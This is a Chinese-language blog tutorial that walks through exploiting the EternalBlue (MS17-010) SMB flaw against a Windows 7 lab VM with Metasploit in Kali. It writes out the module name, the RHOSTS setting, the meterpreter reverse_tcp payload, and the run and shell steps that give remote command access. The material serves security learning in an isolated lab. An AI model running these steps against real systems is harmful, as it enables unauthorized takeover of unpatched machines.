前提:
1、已经准备好另一台带着windows7的电脑或者已打开windows7虚拟机(用作靶向机),windows7不知道怎么装的可以看我另一篇笔记VMware安装windows7虚拟机-CSDN博客;
2、靶机和kali要处在同一网段,最省事的办法就是win7和kali的网络都选择桥接模式。
在Kali桌面按下ctrl+alt+t进入终端,输入sudo su后输入密码,回车,进入超级管理员模式
输入msfconsolej进入该软件的命令行,回车
出现msf >就是成功了。
接下来进入正题。
msf的使用仅需三个步骤:选择模块->配置所选模块必选项->运行模块。
本文介绍的是利用“永恒之蓝”漏洞模块。
选择模块:在msf中输入use exploit/windows/smb/ms17_010_eternalblue(这一串是模块的名称,从哪来的可以看我另一篇文章),回车
配置模块:先输入show options查看配置
上半部分的module option是指的当前漏洞/攻击模块的参数(目标、端口等)。
payload options部分设定的是你想对该攻击目标做什么(截图中所显示的windows/x64/meterpreter/reverse_tcp可见该漏洞默认的行为就是获取你的电脑的控制权限)。
• RHOSTS:远程目标IP/网段(几乎所有扫描、漏洞模块必填)
• RPORT:目标开放端口,默认多为80、443、3389等
• LHOST:本机监听IP(反弹马、监听载荷必备)
• LPORT:本机监听端口
• USERNAME/PASSWORD:爆破类模块的账号密码
这里面required栏里面标着yes的就是配置的必选项,current setting栏有内容代表该项目已经配置好了,可以不用管
目前已知就RHOSTS要设置,那么就设置该变量的值。首先查看你的win7的ipv4地址
然后输入set RHOSTS +该ipv4地址(设定某个参数的值的指令基本都是set+参数名+要设定的值)
这个工具默认的攻击窗口是4444,我们也可以切换成其他端口
接下来开始运行模块
输入run然后回车
↑这样就是获取到靶机的权限了,然后会跳出meterpreter >
我们输入shell,直接进入win7靶机的后台
在这里我们可以执行一些指令,举个例子,把靶机里面的某些程序关掉。
在win7打开扫雷
在kali输入tasklist打开进程清单,可以看到扫雷这个进程
输入taskkill /f /im MineSweeper.exe即可关闭该进程
再看回win7,扫雷确实被关闭了
【小瑕疵:可见每次访问的返回值都带有乱码,可以看我另一篇笔记Kali使用细节笔记-CSDN博客的第5条完美修复】